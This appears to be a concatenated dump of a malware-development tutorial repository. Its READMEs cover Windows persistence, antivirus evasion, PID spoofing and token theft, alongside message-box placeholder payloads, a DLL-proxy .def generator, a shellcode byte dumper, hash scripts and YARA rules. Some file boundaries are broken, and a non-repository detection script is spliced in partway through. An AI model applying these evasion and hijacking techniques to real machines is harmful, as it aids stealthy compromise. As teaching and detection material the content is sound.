https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-16-malware-av-evasion-9/hack.exe
--------------------------------------------------------------------------------
/2022-08-16-malware-av-evasion-9/meow.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-16-malware-av-evasion-9/meow.bin
--------------------------------------------------------------------------------
/2022-08-26-malware-pers-9/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 9. C++ malware implementation.

Malware persistence technique - via hijacking default file association. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html](https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html)

--------------------------------------------------------------------------------
/2022-08-26-malware-pers-9/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence via
hijacking default file extension
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/08/26/malware-pers-9.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-08-26-malware-pers-9/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-26-malware-pers-9/hack.exe
--------------------------------------------------------------------------------
/2022-08-26-malware-pers-9/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-08-26-malware-pers-9/pers.exe
--------------------------------------------------------------------------------
/2022-08-26-malware-pers-9/test.txt:
--------------------------------------------------------------------------------
meow-meow test
--------------------------------------------------------------------------------
/2022-09-06-malware-tricks-23/README.md:
--------------------------------------------------------------------------------
# Malware development tricks. Parent PID spoofing. C++ malware implementation.

Malware development: parent PID spoofing + APC injection. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html](https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html)

--------------------------------------------------------------------------------
/2022-09-06-malware-tricks-23/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-06-malware-tricks-23/hack.exe
--------------------------------------------------------------------------------
/2022-09-10-malware-pers-10/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 10. C++ malware implementation.

Malware persistence technique - via IFEO. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html](https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html)

--------------------------------------------------------------------------------
/2022-09-10-malware-pers-10/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence via IFEO
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-09-10-malware-pers-10/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/hack.exe
--------------------------------------------------------------------------------
/2022-09-10-malware-pers-10/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/pers.exe
--------------------------------------------------------------------------------
/2022-09-10-malware-pers-10/pers2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-10-malware-pers-10/pers2.exe
--------------------------------------------------------------------------------
/2022-09-15-malware-av-evasion-10/README.md:
--------------------------------------------------------------------------------
# Malware AV/VM evasion - part 10. C++ malware implementation.

Malware AV/VM evasion. Anti-debugging via NtGlobalFlag. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/09/15/malware-av-evasion-10.html](https://cocomelonc.github.io/malware/2022/09/15/malware-av-evasion-10.html)

--------------------------------------------------------------------------------
/2022-09-15-malware-av-evasion-10/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-15-malware-av-evasion-10/hack.exe
--------------------------------------------------------------------------------
/2022-09-20-malware-pers-11/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 11. C++ malware implementation.

Malware persistence technique - via PowerShell profile. C++ malware implementation example.

[https://cocomelonc.github.io/tutorial/2022/09/20/malware-pers-11.html](https://cocomelonc.github.io/tutorial/2022/09/20/malware-pers-11.html)

--------------------------------------------------------------------------------
/2022-09-20-malware-pers-11/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows
persistence via powershell profile
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-09-20-malware-pers-11/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-20-malware-pers-11/hack.exe
--------------------------------------------------------------------------------
/2022-09-20-malware-pers-11/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-20-malware-pers-11/pers.exe
--------------------------------------------------------------------------------
/2022-09-25-token-theft-1/README.md:
--------------------------------------------------------------------------------
# APT techniques: Access Token manipulation. C++ malware implementation.

APT techniques: Access Token Manipulation. Token theft. C++ implementation example.

[https://cocomelonc.github.io/tutorial/2022/09/25/token-theft-1.html](https://cocomelonc.github.io/tutorial/2022/09/25/token-theft-1.html)

--------------------------------------------------------------------------------
/2022-09-25-token-theft-1/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-25-token-theft-1/hack.exe
--------------------------------------------------------------------------------
/2022-09-30-malware-pers-12/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 12. C++ malware implementation.

Malware persistence technique - via Accessibility Features. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html](https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html)

--------------------------------------------------------------------------------
/2022-09-30-malware-pers-12/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence
via Accessibility Features
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/09/30/malware-pers-12.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-09-30-malware-pers-12/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-30-malware-pers-12/hack.exe
--------------------------------------------------------------------------------
/2022-09-30-malware-pers-12/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-09-30-malware-pers-12/pers.exe
--------------------------------------------------------------------------------
/2022-10-04-malware-pers-13/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 13. C++ malware implementation.

Malware persistence technique - via hijacking uninstall application. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html](https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html)

--------------------------------------------------------------------------------
/2022-10-04-malware-pers-13/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence via
hijacking uninstall app
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/10/04/malware-pers-13.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-10-04-malware-pers-13/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-04-malware-pers-13/hack.exe
--------------------------------------------------------------------------------
/2022-10-04-malware-pers-13/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-04-malware-pers-13/pers.exe
--------------------------------------------------------------------------------
/2022-10-09-malware-pers-14/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 14. C++ malware implementation.

Malware persistence technique - update Event Viewer Log Help link. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html](https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html)

--------------------------------------------------------------------------------
/2022-10-09-malware-pers-14/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence via
event viewer help link update
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-10-09-malware-pers-14/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-09-malware-pers-14/hack.exe
--------------------------------------------------------------------------------
/2022-10-09-malware-pers-14/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-09-malware-pers-14/pers.exe
--------------------------------------------------------------------------------
/2022-10-12-malware-pers-15/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 15. C++ malware implementation.

Malware persistence technique - via hijacking Microsoft Internet Explorer DLL. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/10/12/malware-pers-15.html](https://cocomelonc.github.io/malware/2022/10/12/malware-pers-15.html)

--------------------------------------------------------------------------------
/2022-10-12-malware-pers-15/dll-def.py:
--------------------------------------------------------------------------------
import pefile
import sys
import os.path

# usage: python3 dll-def.py <path/to/original.dll>
# writes <original>.def next to the script, listing every named export
# of the original DLL as a forwarder entry "name=<basename>.name @ordinal"
dll = pefile.PE(sys.argv[1])
dll_basename = os.path.splitext(sys.argv[1])[0]

try:
    with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f:
        f.write("EXPORTS\n")
        for export in dll.DIRECTORY_ENTRY_EXPORT.symbols:
            if export.name:
                f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal))
except Exception as e:
    print("failed to create .def file :( ({})".format(e))
else:
    print("successfully created .def file :)")

--------------------------------------------------------------------------------
/2022-10-12-malware-pers-15/evil.c:
--------------------------------------------------------------------------------
/*
evil.c - malicious DLL
DLL hijacking with exported functions example
author: @cocomelonc
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      MessageBox(
        NULL,
        "Meow-woof!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}

--------------------------------------------------------------------------------
/2022-10-12-malware-pers-15/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-12-malware-pers-15/evil.dll
--------------------------------------------------------------------------------
/2022-10-12-malware-pers-15/suspend.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-12-malware-pers-15/suspend.dll
--------------------------------------------------------------------------------
/2022-10-21-malware-pers-16/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 16. C++ malware implementation.

Malware persistence technique - via hijacking the Cryptography DLL path in the Registry. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/10/21/malware-pers-16.html](https://cocomelonc.github.io/malware/2022/10/21/malware-pers-16.html)

--------------------------------------------------------------------------------
/2022-10-21-malware-pers-16/hack.c:
--------------------------------------------------------------------------------
/*
hack.c - malicious DLL
DLL hijacking Cryptography registry path
author: @cocomelonc
*/

#include <windows.h>
#pragma comment (lib, "user32.lib")

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
  switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
      MessageBox(
        NULL,
        "Meow-meow!",
        "=^..^=",
        MB_OK
      );
      break;
    case DLL_PROCESS_DETACH:
      break;
    case DLL_THREAD_ATTACH:
      break;
    case DLL_THREAD_DETACH:
      break;
  }
  return TRUE;
}

--------------------------------------------------------------------------------
/2022-10-21-malware-pers-16/hack.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-21-malware-pers-16/hack.dll
--------------------------------------------------------------------------------
/2022-10-21-malware-pers-16/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-21-malware-pers-16/pers.exe
--------------------------------------------------------------------------------
/2022-10-28-malware-pers-17/hack.cpp:
--------------------------------------------------------------------------------
/*
hack.cpp
evil app for windows persistence via
change.exe
author: @cocomelonc
https://cocomelonc.github.io/malware/2022/10/28/malware-pers-17.html
*/
#include <windows.h>
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-10-28-token-theft-2/README.md:
--------------------------------------------------------------------------------
# APT techniques: Access Token theft via UpdateProcThreadAttribute. C++ malware implementation.

APT techniques: Access Token theft via UpdateProcThreadAttribute and CreateProcessW. C++ implementation example.

[https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html](https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html)

--------------------------------------------------------------------------------
/2022-10-28-token-theft-2/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-28-token-theft-2/hack.exe
--------------------------------------------------------------------------------
/2022-11-02-malware-pers-18/README.md:
--------------------------------------------------------------------------------
# Malware development: persistence - part 18. C++ malware implementation.

Malware persistence technique - via Windows Error Reporting. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html](https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html)

--------------------------------------------------------------------------------
/2022-11-02-malware-pers-18/hack.cpp:
--------------------------------------------------------------------------------
/*
meow-meow messagebox
author: @cocomelonc
*/
#include <windows.h>

#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBoxA(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2022-11-02-malware-pers-18/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-02-malware-pers-18/hack.exe
--------------------------------------------------------------------------------
/2022-11-02-malware-pers-18/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-02-malware-pers-18/pers.exe
--------------------------------------------------------------------------------
/2022-11-05-malware-analysis-6/aes.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/aes.bin
--------------------------------------------------------------------------------
/2022-11-05-malware-analysis-6/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/hack.exe
--------------------------------------------------------------------------------
/2022-11-05-malware-analysis-6/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/hack2.exe
--------------------------------------------------------------------------------
/2022-11-05-malware-analysis-6/meow.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/meow.bin
--------------------------------------------------------------------------------
/2022-11-05-malware-analysis-6/xor.bin:
--------------------------------------------------------------------------------
(binary file; contents not representable as text)
--------------------------------------------------------------------------------
#pragma comment (lib, "user32.lib")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
  MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK);
  return 0;
}

--------------------------------------------------------------------------------
/2023-01-20-malware-pers-21/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-20-malware-pers-21/hack.exe
--------------------------------------------------------------------------------
/2023-01-20-malware-pers-21/pers.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-20-malware-pers-21/pers.exe
--------------------------------------------------------------------------------
/2023-01-27-malware-analysis-7/README.md:
--------------------------------------------------------------------------------
# Malware analysis: part 7. Yara rule for CRC32.

Malware analysis: part 7. Hashing WinAPI function names via CRC32. C++ malware implementation example. CRC32 in REvil ransomware.

[https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html](https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html)

--------------------------------------------------------------------------------
/2023-01-27-malware-analysis-7/crc32.py:
--------------------------------------------------------------------------------
import zlib

# crc32 of a byte string, printed as hex and decimal
def crc32(data):
    h = zlib.crc32(data) & 0xffffffff
    print("0x%08x" % h)
    print(h)
    return h

crc32(b"MessageBoxA")

--------------------------------------------------------------------------------
/2023-01-27-malware-analysis-7/crc32.yar:
--------------------------------------------------------------------------------
rule crc32_hash
{
    meta:
        author = "cocomelonc"
        description = "crc32 constants"
    strings:
        $c = { 2083B8ED }
    condition:
        $c
}

--------------------------------------------------------------------------------
/2023-01-27-malware-analysis-7/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-27-malware-analysis-7/hack.exe
--------------------------------------------------------------------------------
/2023-01-27-malware-analysis-7/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-27-malware-analysis-7/hack2.exe
--------------------------------------------------------------------------------
/2023-02-10-malware-analysis-8/README.md:
--------------------------------------------------------------------------------
# Malware analysis - part 8. Yara rule example for MurmurHash2. C++ malware implementation.

Yara rule for WinAPI function calls hashed with MurmurHash2. MurmurHash2 in Conti. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html](https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html)

--------------------------------------------------------------------------------
/2023-02-10-malware-analysis-8/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-10-malware-analysis-8/hack.exe
--------------------------------------------------------------------------------
/2023-02-10-malware-analysis-8/murmur.py:
--------------------------------------------------------------------------------
def murmurhash2(key: bytes, seed: int) -> int:
    # 32-bit MurmurHash2 (Austin Appleby's reference layout):
    # every arithmetic step is masked to 32 bits, and the 1-3 trailing
    # bytes are mixed in separately instead of being zero-padded
    m = 0x5bd1e995
    r = 24
    mask = 0xffffffff
    n = len(key)
    h = (seed ^ n) & mask
    nblocks = n // 4
    for i in range(nblocks):
        k = int.from_bytes(key[4 * i:4 * i + 4], "little")
        k = (k * m) & mask
        k ^= k >> r
        k = (k * m) & mask
        h = (h * m) & mask
        h ^= k
    tail = key[4 * nblocks:]
    if len(tail) >= 3:
        h ^= tail[2] << 16
    if len(tail) >= 2:
        h ^= tail[1] << 8
    if len(tail) >= 1:
        h ^= tail[0]
        h = (h * m) & mask
    h ^= h >> 13
    h = (h * m) & mask
    h ^= h >> 15
    return h

h = murmurhash2(b"meow-meow", 0)
print("%x" % h)
print("%d" % h)
--------------------------------------------------------------------------------
/2023-02-10-malware-analysis-8/murmur.yar:
--------------------------------------------------------------------------------
rule murmurhash2_rule {
    meta:
        author = "cocomelonc"
        description = "example rule using MurmurHash2A with constant 0x5bd1e995"
    strings:
        $hash = { 95 e9 d1 5b }
    condition:
        $hash
}

--------------------------------------------------------------------------------
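Both YARA rules in this repository (crc32.yar and murmur.yar) key on the same thing: the little-endian bytes of a hashing constant (the reversed CRC-32 polynomial 0xEDB88320, the MurmurHash2 multiplier 0x5bd1e995) sitting as an immediate operand inside the code. The script below is an added example and is not part of the cocomelonc/meow repository. It does in Python what those two rules do in YARA, and then takes the analyst's next step: once the hash algorithm is identified, it builds a lookup table of hashed WinAPI names and resolves every hashed value found in the bytes. The sample byte blob, its layout and the short API name list are constructed here for illustration; the hash function is zlib's CRC-32, and the same resolver accepts any other 32-bit hash callable (for example the murmurhash2 from murmur.py above).

```python
"""Locate hashing constants in a byte blob and resolve CRC32-hashed API names.

Added example, not repository code. Constants come from the repository's
crc32.yar / murmur.yar; the sample blob and the API name list are constructed.
"""
import struct
import zlib

# (constant, which repository rule matches its little-endian encoding)
HASH_CONSTANTS = {
    0xEDB88320: "CRC-32 reversed polynomial (crc32.yar: { 2083B8ED })",
    0x5BD1E995: "MurmurHash2 multiplier m (murmur.yar: { 95 e9 d1 5b })",
}

# illustrative subset of WinAPI names a hashed-import resolver would carry
API_NAMES = ["MessageBoxA", "LoadLibraryA", "GetProcAddress",
             "VirtualAlloc", "CreateThread"]


def crc32_hash(name: str) -> int:
    """32-bit CRC of an ASCII API name, as crc32.py computes it."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def find_hash_constants(blob: bytes):
    """Return sorted (offset, constant, description) for every occurrence of a
    known hashing constant encoded little-endian, i.e. the YARA hex patterns."""
    hits = []
    for const, desc in HASH_CONSTANTS.items():
        needle = struct.pack("<I", const)
        start = 0
        while True:
            idx = blob.find(needle, start)
            if idx == -1:
                break
            hits.append((idx, const, desc))
            start = idx + 1
    return sorted(hits)


def build_hash_table(names, hashfn):
    """Map hash value -> API name for the chosen hash function."""
    return {hashfn(n): n for n in names}


def resolve_hashed_values(blob: bytes, table):
    """Slide a 4-byte little-endian window over the blob and report every
    dword that equals the hash of a known API name."""
    found = []
    for off in range(len(blob) - 3):
        val = struct.unpack_from("<I", blob, off)[0]
        if val in table:
            found.append((off, table[val]))
    return found


# Constructed sample: NOP padding around three 32-bit immediates, laid out as
# 8 bytes padding | CRC-32 polynomial | 4 | crc32("MessageBoxA") | 4 | murmur m | 4
SAMPLE = (b"\x90" * 8
          + struct.pack("<I", 0xEDB88320)
          + b"\x90" * 4
          + struct.pack("<I", crc32_hash("MessageBoxA"))
          + b"\x90" * 4
          + struct.pack("<I", 0x5BD1E995)
          + b"\x90" * 4)


def main():
    for off, const, desc in find_hash_constants(SAMPLE):
        print("0x%04x: 0x%08x  %s" % (off, const, desc))
    table = build_hash_table(API_NAMES, crc32_hash)
    for off, name in resolve_hashed_values(SAMPLE, table):
        print("0x%04x: 0x%08x -> %s" % (off, crc32_hash(name), name))


if __name__ == "__main__":
    main()
```

Running it on the constructed sample reports the CRC-32 polynomial at offset 8 and the MurmurHash2 multiplier at offset 24, then resolves the dword at offset 16 to MessageBoxA. On a real sample the constant hits tell you which table to build; the resolver then turns an opaque list of hash values back into import names without executing anything.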
/2023-02-13-malware-av-evasion-11/README.md:
--------------------------------------------------------------------------------
# Malware dev: AV engines evasion techniques - part 11. C++ malware implementation.

AV engines evasion via encrypting and decrypting the payload with the DES algorithm. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2023/02/13/malware-av-evasion-11.html](https://cocomelonc.github.io/malware/2023/02/12/malware-av-evasion-11.html)

--------------------------------------------------------------------------------
/2023-02-13-malware-av-evasion-11/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack.exe
--------------------------------------------------------------------------------
/2023-02-13-malware-av-evasion-11/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack2.exe
--------------------------------------------------------------------------------
/2023-02-13-malware-av-evasion-11/hack3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack3.exe
--------------------------------------------------------------------------------
/2023-02-20-malware-av-evasion-12/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack.exe
--------------------------------------------------------------------------------
/2023-02-20-malware-av-evasion-12/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack2.exe
--------------------------------------------------------------------------------
/2023-02-20-malware-av-evasion-12/hack3.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack3.exe
--------------------------------------------------------------------------------
/2023-02-20-malware-av-evasion-12/hack4.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack4.exe
--------------------------------------------------------------------------------
/2023-03-09-malware-av-evasion-13/README.md:
--------------------------------------------------------------------------------
# Malware dev: AV engines evasion techniques - part 13. C++ malware implementation.

AV engines evasion via encrypting and decrypting the payload with the Madryga algorithm. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2023/03/09/malware-av-evasion-13.html](https://cocomelonc.github.io/malware/2023/03/09/malware-av-evasion-13.html)

--------------------------------------------------------------------------------
/2023-03-09-malware-av-evasion-13/madryga.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-09-malware-av-evasion-13/madryga.exe
--------------------------------------------------------------------------------
/2023-03-09-malware-av-evasion-13/meow.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-09-malware-av-evasion-13/meow.bin
--------------------------------------------------------------------------------
/2023-03-09-malware-av-evasion-13/meow.py:
--------------------------------------------------------------------------------
# dump ./meow.bin as a C byte-array initializer, e.g. { 0x1, 0xab, ... };
with open("./meow.bin", "rb") as f:
    plaintext = f.read()

# iterating a bytes object yields ints, so hex() can be applied directly
cbytes = '{ 0x' + ', 0x'.join(hex(b)[2:] for b in plaintext) + ' };'
print(cbytes)
--------------------------------------------------------------------------------
/2023-03-24-malware-av-evasion-14/README.md:
--------------------------------------------------------------------------------
# Malware dev: AV engines evasion techniques - part 14. C++ malware implementation.

AV engines evasion via encrypting and decrypting the payload with the A5/1 GSM algorithm. C++ malware implementation example.

[https://cocomelonc.github.io/malware/2023/03/24/malware-av-evasion-14.html](https://cocomelonc.github.io/malware/2023/03/24/malware-av-evasion-14.html)

--------------------------------------------------------------------------------
/2023-03-24-malware-av-evasion-14/hack.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack.exe
--------------------------------------------------------------------------------
/2023-03-24-malware-av-evasion-14/hack2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack2.exe
--------------------------------------------------------------------------------
/2023-03-24-malware-av-evasion-14/hack3.exe:
